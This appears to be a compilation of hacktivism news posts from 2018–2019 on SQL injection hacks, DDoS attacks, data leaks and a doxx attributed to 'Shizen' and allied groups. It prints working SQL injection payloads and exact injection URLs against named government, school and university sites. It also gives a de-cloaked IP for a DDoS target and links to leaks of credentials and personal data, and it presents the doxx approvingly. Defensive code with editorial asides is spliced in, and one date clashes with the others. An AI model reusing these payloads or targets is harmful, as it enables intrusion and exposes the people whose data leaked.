Hacker Doxxes Suspect To Avenge Leak of Brasilian Federal Police

In a move I have honestly never seen before, a hacker going by the name of “Sharp3” has managed to uncover the identity of another hacker going by the name of “Tr3v0r” – who was responsible for a hack and data leak affecting the Brasilian Federal Police earlier this morning. Not only this, but Sharp3 also personally took it upon himself to assemble screenshots of the leaked data, proof of authorship that Tr3v0r first hacked and leaked the information, as well as personal pictures exposing his real-life identity. Sharp3 then compiled the entirety of the information and loaded it onto a custom domain – see below – and hand delivered the information to the inboxes of each of the 249 police officers exposed by this morning's data breach – lulz.

It should go without saying, but this is a doxx the likes of which no one has ever seen before – which is what makes it newsworthy here today. It also adds to a recent trend over the last 3 weeks or so of different hackers being exposed by other hackers. For example, Sh4rpShooter of Pryzraky, Shizen of New World Hackers and Mr. Attacker of AnonGhost have all been exposed by rival hackers within the course of the last two weeks alone.

Website Featuring Doxx of Tr3v0r: https://www.inocent.com.br/uploads/tr3v0r.php

Screen shot from the doxx: [image not reproduced]

Batticaloa Municipal Council of Sri Lanka Hacked, Site Databases Leaked Online

Shortly after New Year's 2019, hackers “Shizen” and “Ftp” announced a hack of the Batticaloa Municipal Council in Sri Lanka. While the leak contains some 760 lines, most notably it includes the personal information of 22 website administrators, including their usernames, email addresses, phone numbers and full passwords – theoretically granting anyone access to the back end of the website. Also included in the leaked databases is personal information on 100 Municipal Council members, including their full names, addresses, emails, ID numbers, passwords, phone numbers and usernames.

Website Affected: hxxp://batticaloa.mc.gov.lk
Raw Leak: https://ghostbin.com/paste/r5s4d

Examples: [images not reproduced]

https://twitter.com/__sh1z3n/status/1080216837873459201

East Sac Community School District Hacked, Databases Leaked Online

Last night “Shizen” and “Ftp” of New World Hackers announced a hack of East Sac Community School District in Lake View, Iowa, allowing the group to gain remote access to several site databases before compiling and ultimately dumping the information online. In a press release made available to the public through Ghostbin, Shizen explains how they were able to hack the website through various SQL injections, granting them access to PHP 5.6.23 files hosted alongside a MySQL database on the Nginx web server of a WordPress website.

Parameter: id (GET)

Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=7 AND 1973=1973

Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY, or GROUP BY clause (FLOOR)
Payload: id=7 AND (SELECT 4390 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(4390=4390,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=7 AND SLEEP(5)

Exposed within the leak are the exact vulnerabilities affecting the site, the payloads delivered to compromise it, as well as the root admin username and password. You can also find the contact information of various school employees/administrators, including full names, positions, email addresses and phone numbers, as well as the login user names, emails and hashed passwords of various site administrators.
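To show why a boolean-based blind payload like the `id=7 AND 1973=1973` listed above works, and what the fix looks like, here is an added illustration that is not code from the original post or from the group it describes. It uses SQLite in place of MySQL, which is enough to show the true/false differential the technique relies on; the table, rows and function names are constructed for the example, since the district's real schema is not on the page.

```python
import sqlite3

# Constructed stand-in for a site's content table; the district's real schema is not on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)",
                     [(7, "Board meeting minutes"), (8, "Lunch menu")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """The anti-pattern: the GET parameter is spliced into the SQL text, so
    '7 AND 1973=1973' is executed as part of the WHERE clause. A true
    condition returns the row, a false one returns nothing, and that
    difference in the response is the oracle a blind injection reads."""
    sql = "SELECT title FROM posts WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, raw_id):
    """Hardened version: validate the type first, then bind the value with a
    placeholder so the driver never parses it as SQL. Returns None on reject."""
    try:
        post_id = int(raw_id)
    except ValueError:
        return None  # caller should answer 400 and log the attempt
    return [row[0] for row in conn.execute(
        "SELECT title FROM posts WHERE id = ?", (post_id,))]


if __name__ == "__main__":
    db = make_db()
    for probe in ("7", "7 AND 1973=1973", "7 AND 1973=1974"):
        print(f"{probe!r:>20} vulnerable={lookup_vulnerable(db, probe)} "
              f"parameterized={lookup_parameterized(db, probe)}")
```

Running it prints the same row for both the plain id and the true probe, an empty result for the false probe, and a rejection for anything that is not an integer in the parameterized version. The validation step is what removes the differential; binding alone would already stop the text being parsed as SQL.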

Website Hit: hxxp://eastsac.k12.ia.us/
Raw Leak: https://ghostbin.com/paste/hwpf2

https://twitter.com/__sh1z3n/status/1079928590517657601?s=19

Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, December 31st 2018, hackers “Shizen” and “Ftp” of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brasil, managing to leak the contents of databases tied to the Hematology and Hemotherapy Center of Piauí online. Having covered Shizen many times in the past, this appears to be the first hack carried out under the banner of New World Hackers, after previously conducting hacks on behalf of Pryzraky – perhaps indicating a change of teams or allegiances.

Regardless, to serve as proof of the hack, in a data dump posted to Twitter this morning, the hackers posted a mirror of the site's contents – 21 different databases in all. Analyzing the hack, it appears as though the group was able to gain remote access to site databases through a multitude of SQL vulnerabilities left unaddressed by site security architects, ultimately granting hackers access to PHP 5.3.3 files attached to a MySQL 5.0 database hosted on an Apache 2.2.16 web server. In another surprise move, Shizen even released the exact vulnerabilities and payloads delivered within the framework of the leak itself – something normally redacted or kept private.

For example, here are the 4 SQL vulnerabilities implicated:

Website Hit: hxxp://hemopi.pi.gov.br/

Vulnerability 1: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=13' AND 7214=7214 AND 'aWjt'='aWjt

Vulnerability 2: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13' AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lEbP'='lEbP

Vulnerability 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13' AND SLEEP(5) AND 'ouoQ'='ouoQ

Vulnerability 4: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: id=13' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)-- EKMl

Raw Database Leak: https://ghostbin.com/paste/6w4ok
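A defender-side check, added here and not part of the leak or the original post: the four payload classes listed for this site, and the three in the East Sac listing further up the page (boolean-based blind, error-based FLOOR/RAND, time-based SLEEP, UNION), leave recognisable signatures in web server access logs once the query string is percent-decoded. The script below parses combined-format log lines, decodes each parameter, and tags the classes it sees. The log lines are constructed to mirror those payloads; the client address, path and timestamps are made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined-log style) whose query strings carry the same
# four payload shapes listed on the page; client address, path and times are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [31/Dec/2018:10:01:02 +0000] "GET /pagina.php?id=13 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [31/Dec/2018:10:01:03 +0000] "GET /pagina.php?id=13%27%20AND%207214%3D7214%20AND%20%27aWjt%27%3D%27aWjt HTTP/1.1" 200 5120',
    '203.0.113.5 - - [31/Dec/2018:10:01:04 +0000] "GET /pagina.php?id=13%27%20AND%20SLEEP%285%29%20AND%20%27ouoQ%27%3D%27ouoQ HTTP/1.1" 200 5120',
    '203.0.113.5 - - [31/Dec/2018:10:01:05 +0000] "GET /pagina.php?id=13%27%20AND%20%28SELECT%208268%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716a767071%2C%28SELECT%20%28ELT%288268%3D8268%2C1%29%29%29%2C0x716a716a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 1200',
    '203.0.113.5 - - [31/Dec/2018:10:01:06 +0000] "GET /pagina.php?id=13%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20EKMl HTTP/1.1" 200 5300',
]

# One signature per injection class named in the sqlmap-style listings on the page.
PATTERNS = {
    "boolean-based blind": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+\b", re.I),
    "error-based (FLOOR/RAND)": re.compile(r"FLOOR\s*\(\s*RAND\s*\(.*GROUP\s+BY", re.I | re.S),
    "time-based blind": re.compile(r"\bSLEEP\s*\(", re.I),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}

# Pulls the request target out of the quoted request line of a combined-format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def classify_value(value):
    """Return the names of every payload class whose signature appears in a decoded parameter value."""
    return [name for name, pat in PATTERNS.items() if pat.search(value)]


def scan_log_line(line):
    """Map each query parameter of the request to the classes found in it; empty dict if clean or unparseable."""
    m = REQUEST_RE.search(line)
    if not m:
        return {}
    parts = urlsplit(m.group(1))
    flagged = {}
    # parse_qsl percent-decodes values, so %27 and %20 become the raw quote and space
    # before the signatures are applied.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        tags = classify_value(value)
        if tags:
            flagged[name] = tags
    return flagged


def scan(lines):
    """Return one (path, parameter, tags) tuple per flagged parameter, in log order."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        path = urlsplit(m.group(1)).path if m else ""
        for name, tags in scan_log_line(line).items():
            hits.append((path, name, tags))
    return hits


if __name__ == "__main__":
    for path, param, tags in scan(SAMPLE_LOG):
        print(f"{path} param={param}: {', '.join(tags)}")
```

The first line, a plain `id=13`, produces no hit; the other four each produce exactly one tag. Matching is done on the decoded value rather than the raw request line, so the `%27` quote and `%20` spaces that appear in real logs do not hide the keywords, and the error-based signature requires the FLOOR(RAND()) and GROUP BY pair rather than either keyword alone, which keeps ordinary reporting queries out of the alert stream.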


https://twitter.com/__sh1z3n/status/1079589738355531777

l’academie de Grenoble Refused To Negotiate, So SHIZEN Dumps SQL Vulnerabilities & Exposed Databases Online

On December 6th 2018, Rogue Media Labs covered an article detailing the hack of two international universities by a Brasilian based hacker known as “SHIZEN.” However, what made the incident interesting or unique at the time was that SHIZEN did not disclose the databases he had uncovered, or how he went about doing so – something he is regularly known for doing. Instead, he tagged l’academie de Grenoble in the hack, asking them to reach out to him to learn where/how he got into their systems and where their website was vulnerable. Over the week and a half since, SHIZEN has continued to keep this information to himself, trolling the university on multiple occasions and asking them to contact him about the hack – lest he release the information in its entirety online. After days with no response, this is exactly what SHIZEN did this morning.

In a data dump released to the public via Ghostbin this morning, December 15th 2016, SHIZEN released the contents of the databases exposed in the December 6th hack, explaining how he was able to breach l’academie de Grenoble’s website through an SQL vulnerability tied to the academy’s math department. More specifically, SHIZEN was able to access PHP version 5.3.3 files belonging to an extremely outdated MySQL database attached to an nginx web server. In fact, the MySQL database was so outdated that its version wasn’t even readily identifiable.

Target Website: hxxp://ac-grenoble.com
SQL User Haxxed: plantet_math@triton2.ac-grenoble
Location of SQL Injection: hxxps://ac-grenoble.fr/disciplines/maths/pages/PM/fonction/telechargement.php?/fichier/=1899%27%20and%20[t]%20and%20%271%27=%271
Database Name: De8u1
Data Dump: https://ghostbin.com/paste/58cjh

https://twitter.com/__sh1z3n/status/1074336600333656064?s=19

Central Bank of The Bahamas Crashed for +28 Hours by SHIZEN

In conjunction with #OpIcarus2018, hacker “SHIZEN” of Pryzraky has launched a series of web attacks and DDoS against central banks worldwide. Chief among them was an attack on the Central Bank of the Bahamas, which was downed for well over 24 hours between the dates of December 12th to 14th, 2018. As of 9 a.m. Friday morning the bank’s official website appears to be back up and running again, but the site’s administrators have had to put it behind Cloudflare just to make this happen.

Upon investigating the website further, the site’s theme manager and developer, Thyme Online, has still yet to install an active SSL certificate for the website, and its front end still suffers from a lack of basic and fundamental security measures. According to their web page, the Central Bank of the Bahamas currently manages over 55 million dollars in assets, but it remains unclear how much of a financial impact the latest cyber attack has had on their business.

According to SHIZEN, “The Central Bank Of Bahamas it’s an easy target, the website is protected by Cloudflare but as long as the DDoS doesn’t exceed the 1 TBPS limit. I have attacked with a Python Script named: http://leet.py & http://blastaered.pl The website has been taken down for 28 hours before it was changed over to Cloudflare, now if you make a check-host you can see an error “503 (Service Temporarily Unavailable)”, the website works because he have changed the Cloudflare, so I think I’ll try to take down it with an IRC Botnet or an MIRAI next.”

Rogue Security Labs has reached out to the Bahamas Central Bank for comment on the incident, but as of December 15th 2018 the bank has declined to respond.

Website Hit: hxxp://centralbankbahamas.com
American Bank Proxy: 104.31.86.108
Target Behind Cloudflare: 24.244.141.213

https://twitter.com/zglobal_/status/1073103906119520256

https://twitter.com/LulzSeguridad/status/1073472075979997184

https://twitter.com/zglobal_/status/1073460209249673216

San Jose State University Hacked, French National Police/DynDNS/Internet Brasil Downed by Shizen

This past weekend SHIZEN of the Brasilian based hacking group Pryzraky was active in a string of international incidents. The first hack targeted San Jose State University in California – USA, the second targeted French National Police and DynDNS, also located in France, and the third targeted Internet Brasil – all via Denial of Service (DoS) attacks.

In statements online, SHIZEN explained how he was able to target San Jose State University through an SQL vulnerability tied to the site’s back end – though he opted to keep the specific URL affected private. Using it, SHIZEN managed to exploit a MySQL version 4.1 database attached to an Oracle iPlanet 7.1 web server, exposing approximately 42 databases attached to/affiliated with the website. SHIZEN officially labeled the hack #OpEdu, a new global hacking operation targeting international universities and educational institutions, unveiled to the public for the first time just last week.

Website Affected: hxxp://as.sjsu.edu
Raw Leak: https://ghostbin.com/paste/g3rmc

https://twitter.com/zglobal_/status/1071686648390393864?s=19

In support of the French national protests and of #OpFrance, an Anonymous operation designed to take down/hack websites associated with the French Government and French banking institutions, SHIZEN’s second round of attacks Saturday night targeted various networks around France. The first DoS attack targeted the French National Police, managing to take their website offline for at least the better part of the day. In fact, at the time of this article, December 9th 2018 20:00, the website still remains inaccessible to the international public. The second attack targeted an OVH server tied to DynDNS France, managing to take it offline for a few hours. Lastly, the third DoS attack took down the website affiliated with Internet Brasil, a Brasilian based telecommunications firm.

Websites Tango Down’ed:

hxxp://nationale-police.net
hxxp://dyndns.fr
hxxp://internetbrasil.com.br

https://twitter.com/zglobal_/status/1071869522066452485?s=19

https://twitter.com/zglobal_/status/1071432165185998848?s=19

https://twitter.com/zglobal_/status/1071672761469333504?s=19

Academia Nacional De La Historia De La Republica Argentina Hacked by Pryzraky

On December 6th 2018, the website of the Academia Nacional De La Historia De La Republica Argentina (the National Academy of History of the Argentine Republic) was hacked, and sensitive information tied to clients of the website was leaked online. The hack was claimed as the result of a joint operation conducted by the Brasilian based hacking group “Pryzraky,” including members @Mecz1nho, @Ergo_hacker, @SH4RPSH0OTER, @Purpl3P, @Lil_Sh4wtyy, @zglobal_ and @Penichemito.

According to SHIZEN, hackers were able to exploit an Apache 2, PHP 7.0.30 file server attached to the back end of the website via SQL Injection – though they declined to share the exact payload or the specific URL affected. The data exposed includes the first and last names, telephone numbers, email addresses, physical addresses and identification numbers of various clients belonging to the website.

Website Affected: hxxp://www.anh.org.ar/
Raw Full Leak: https://ghostbin.com/paste/nmw7d

https://twitter.com/zglobal_/status/1070775158414237696

Data/Telecommunications Firm Digitel Brasil Hacked, Hundreds of Restricted Access Account Owners Emails & Passwords Dumped Online

Earlier today, December 6th 2018, Digitel Brasil, a Brasilian based tech firm specializing in enterprise data and telecommunications solutions, was hacked by “SHIZEN,” a member of the Brasilian based hacking group Pryzraky. In a press release made available to the public via his Twitter page, SHIZEN explains how he was able to breach a Microsoft-IIS/6.0 web server tied to the IP address 192.252.46.52 through an SQL Injection vulnerability in the site’s back end, exposing 3 databases, 26 tables and hundreds of email accounts along with their passwords. To be more exact, approximately 255 registered account owners with restricted access to digitel.com.br had their login email addresses and passwords compromised by the data breach.

When asked whether the accounts exposed belonged to Digitel Brasil customers or corporate employees, SHIZEN simply responded “Yes!” – indicating that the leak was a mixture of both. At this time Digitel Brasil has yet to release a statement on the matter, and it remains unclear if they are even aware of the breach in the first place.

Website Affected: hxxp://digitel.com.br
Raw Data Leak: https://pastebin.com/beYvDSDE

https://twitter.com/zglobal_/status/1070561436710199296

Baqai Medical University In Pakistan & French l’académie de Grenoble Hacked by SHIZEN

Despite announcing his intentions to “go inactive for while” at the start of the month, earlier today, December 5th 2018, a hacker going by the name of “SHIZEN” announced his latest string of hacks on social media. The first attack targeted l’académie de Grenoble in France, disclosing an SQL vulnerability tied to the site’s back end – exposing two site databases. The second hack targeted Baqai Medical University in Sindh, Pakistan, analysis of which suggests that SHIZEN was able to exploit a misconfiguration of the website’s PHP admin access panel, also via SQL injection, allowing hackers to remotely access databases attached to the site.

While no explanation or motive for the hacks was given, SHIZEN did tag the hack #OpEdu, perhaps indicating that this is the beginning of a much larger operation targeting international educational institutions. Other groups such as “PinkiHacks” in Israel have also been very active hacking major international universities over the course of the last several weeks – though at this time there appears to be no correlation between the attacks/incidents.

l’académie de Grenoble Hack:

Website Affected: hxxp://ac-grenoble.fr/


Baqai Medical University Hack & Leak:

Website Affected: hxxp://baqai.edu.pk/
URL Address Exploited: hxxp://baqai.edu.pk/NewsDetail.php?id=47999999.9
Raw Leak: https://ghostbin.com/paste/37toz


https://twitter.com/zglobal_/status/1070357285849976839

https://twitter.com/zglobal_/status/1070345966866325504